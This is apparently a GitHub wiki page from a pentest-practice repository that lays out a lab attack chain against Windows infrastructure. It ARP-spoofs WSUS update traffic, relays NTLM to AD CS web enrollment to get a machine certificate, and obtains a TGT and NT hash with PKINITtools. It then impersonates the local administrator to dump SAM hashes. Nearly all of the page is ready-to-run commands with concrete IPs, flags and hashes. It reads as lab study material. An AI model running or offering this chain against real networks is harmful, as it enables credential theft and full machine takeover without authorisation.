MITM: WSUS spoof and and ADCS - oscpname/RELAY_scenarios GitHub Wiki

MANUAL: https://j4s0nmo0n.github.io/belettetimoree.github.io/2023-12-01-WSUS-to-ESC8.html

Tools:

• arpspoof
• NTLM relay

Attack script:

1. intercept Windows Update traffic by using ARP-Spoof attack
2. Relay to ADCS > get Machine certificate
3. Obtain TGT and NT hash
4. Impersonate Admin on the target machine

setup

• DC-CURSE (192.168.56.105): domain controller
• WSUS (192.168.56.114): Windows Service Update Server (with HTTP)
• CURSE-COMP (192.168.56.108): Windows 11 client machine
• attacker machine (192.168.56.115)

#intercept Windows Update traffic by using ARP-Spoof attack
sudo arpspoof -i enp0s3 -t 192.168.56.108 192.168.56.114 
sudo arpspoof -i enp0s3 -t 192.168.56.114 192.168.56.108 
#internal forward to ntlmrelay at port 80
sudo iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 80

# Relay to ADCS
python3 ntlmrelayx.py -t http://192.168.56.105/certsrv/certfnsh.asp -smb2support --adcs

#got the certificate let’s authenticate with PKINIT to the domain and get TGT
python3 /opt/PKINITtools/gettgtpkinit.py -pfx-base64 \$(cat a.b64) 'jjk.local/CURSE-COMP$' 'curse-comp.ccache' -dc-ip 192.168.56.105
export KRB5CCNAME=curse-comp.ccache
klist
#U2U  - request a service ticket to ourself while adding our TGT as “additional tickets”
python3 /opt/PKINITtools/getnthash.py jjk.local/CURSE-COMP\$ -key f00b6e57ffaf6f23002b39d72ed6f34e0bfa9824db4fe8ccbe28f82b4c96119b
# verify the NT hash
nxc smb 192.168.56.105 -u  CURSE-COMP\$ -H "8a03b8e0fb9728ee5d6dd1eb356a5270"

#impersonate Admin on the target machine and extract hashes from SAM
nxc smb CURSE-COMP.jjk.local -u 'CURSE-COMP$' -H '8a03b8e0fb9728ee5d6dd1eb356a5270' --delegate administrateur --self --sam